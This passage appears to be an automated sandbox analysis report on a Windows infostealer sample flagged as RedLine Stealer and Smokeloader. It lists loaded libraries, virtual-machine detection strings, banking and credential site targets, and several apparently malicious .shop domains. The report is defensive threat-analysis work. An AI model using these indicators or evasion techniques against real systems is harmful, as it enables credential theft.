            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0216AF170_2_0216AF17
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0214DF170_2_0214DF17
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0215FF230_2_0215FF23
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_02164F560_2_02164F56
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_02165F7A0_2_02165F7A
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_02172F870_2_02172F87
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_02150FF70_2_02150FF7
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_02147FFA0_2_02147FFA
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0213EC170_2_0213EC17
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_02172CC70_2_02172CC7
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0213CCC90_2_0213CCC9
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0215ECC90_2_0215ECC9
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_02135D170_2_02135D17
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0214DD370_2_0214DD37
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_02132D870_2_02132D87
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_02162D8B0_2_02162D8B
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0216CDA70_2_0216CDA7
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_02167DD00_2_02167DD0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0215EDC60_2_0215EDC6
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: String function: 00414C10 appears 116 times
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: String function: 02144E77 appears 116 times
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: String function: 00408170 appears 45 times
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: String function: 021383D7 appears 77 times
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2960 -s 1820
            Source: uU6IvUPN39.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 00000000.00000002.1539359212.00000000006AA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: uU6IvUPN39.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@1/1
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_006AAF5E CreateToolhelp32Snapshot,Module32First,0_2_006AAF5E
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0043B870 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,0_2_0043B870
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2960
            Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\2a21b7fc-5800-49ca-baca-6863053e20d7Jump to behavior
            Source: uU6IvUPN39.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: uU6IvUPN39.exe, 00000000.00000003.1441997488.0000000002EAE000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441889021.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1453499032.0000000002EAD000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1453649979.0000000002F43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: uU6IvUPN39.exeVirustotal: Detection: 56%
            Source: uU6IvUPN39.exeReversingLabs: Detection: 55%
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile read: C:\Users\user\Desktop\uU6IvUPN39.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\uU6IvUPN39.exe "C:\Users\user\Desktop\uU6IvUPN39.exe"
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2960 -s 1820
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeSection loaded: msvcr100.dllJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

            Data Obfuscation

            barindex
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeUnpacked PE file: 0.2.uU6IvUPN39.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.xidorow:W;.xiko:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeUnpacked PE file: 0.2.uU6IvUPN39.exe.400000.0.unpack
            Source: uU6IvUPN39.exeStatic PE information: section name: .xidorow
            Source: uU6IvUPN39.exeStatic PE information: section name: .xiko
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_00441850 push eax; mov dword ptr [esp], 0E0908DBh0_2_00441853
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_006AF8E2 pushad ; ret 0_2_006AF8E3
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_006AF94D pushfd ; ret 0_2_006AF94E
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_006AD90E push ebx; ret 0_2_006AD90F
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_006AE4B6 push esi; retn 001Ch0_2_006AE4BA
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0215B05A push ebp; iretd 0_2_0215B05D
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_02171AB7 push eax; mov dword ptr [esp], 0E0908DBh0_2_02171ABA
            Source: uU6IvUPN39.exeStatic PE information: section name: .text entropy: 7.410598344406821
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exe TID: 5272Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: uU6IvUPN39.exe, 00000000.00000003.1453085224.0000000002F46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696494690p
            Source: Amcache.hve.4.drBinary or memory string: VMware
            Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
            Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
            Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
            Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
            Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
            Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
            Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
            Source: uU6IvUPN39.exe, 00000000.00000003.1440748963.000000000072E000.00000004.00000020.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000002.1539384003.0000000000728000.00000004.00000020.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000002.1539384003.00000000006E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
            Source: Amcache.hve.4.drBinary or memory string: vmci.sys
            Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
            Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
            Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
            Source: Amcache.hve.4.drBinary or memory string: VMware20,1
            Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
            Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
            Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
            Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
            Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
            Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
            Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
            Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
            Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
            Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
            Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
            Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
            Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
            Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
            Source: Amcache.hve.4.drBinary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
            Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
            Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
            Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
            Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
            Source: uU6IvUPN39.exe, 00000000.00000003.1440748963.000000000072E000.00000004.00000020.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000002.1539384003.0000000000728000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW*
            Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
            Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
            Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
            Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
            Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
            Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
            Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
            Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeAPI call chain: ExitProcess graph end nodegraph_0-26182
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_004402C0 LdrInitializeThunk,0_2_004402C0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_006AA83B push dword ptr fs:[00000030h]0_2_006AA83B
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0213092B mov eax, dword ptr fs:[00000030h]0_2_0213092B
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_02130D90 mov eax, dword ptr fs:[00000030h]0_2_02130D90

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: uU6IvUPN39.exeString found in binary or memory: robinsharez.shop
            Source: uU6IvUPN39.exeString found in binary or memory: handscreamny.shop
            Source: uU6IvUPN39.exeString found in binary or memory: chipdonkeruz.shop
            Source: uU6IvUPN39.exeString found in binary or memory: versersleep.shop
            Source: uU6IvUPN39.exeString found in binary or memory: crowdwarek.shop
            Source: uU6IvUPN39.exeString found in binary or memory: apporholis.shop
            Source: uU6IvUPN39.exeString found in binary or memory: femalsabler.shop
            Source: uU6IvUPN39.exeString found in binary or memory: soundtappysk.shop
            Source: uU6IvUPN39.exeString found in binary or memory: skidjazzyric.click
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
            Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
